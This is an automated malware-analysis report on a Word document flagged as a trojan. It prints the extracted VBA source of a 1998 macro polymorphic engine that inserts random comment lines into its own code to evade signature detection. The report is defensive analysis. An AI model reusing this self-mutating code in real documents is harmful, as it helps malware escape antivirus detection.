Verdict: MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The critical ClamAV heuristic indicates a detected trojan within an extracted artifact, and the medium heuristic confirms the presence of VBA macros. The extracted VBA code, named 'UMPE', suggests a polymorphic engine designed to obfuscate its functionality, likely to evade detection and execute a malicious payload. The specific purpose of the obfuscated code is not fully discernible due to its polymorphic nature.
Heuristics (1)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code |
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 814 bytes |

SHA-256: 60c622ccc8bc11b578c6c0d73b5d64315513ad446921cc94f0602f10115c520a

Detection:
- ClamAV: Doc.Trojan.UMP-2
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Модуль1"
Sub UMPE()
'ULTRAS MACRO POLYMORPHIC ENGINE for Word97
'ULTRAS 1998
MuNu = Int(Rnd() * 20 + 1)
For Mutate = 1 To MuNu
MuRL = Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.CountOfLines
MuLi = Int(Rnd() * MuRL + 1)
MuLe = Int(Rnd() * 40 + 1)
For MuGe = 1 To MuLe
LiVe = Int((120 - 100 + 1) * Rnd + 228)
MuRe = MuRe + Chr$(LiVe)
Next MuGe
Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe
MuRe = ""
Next Mutate
End Sub
```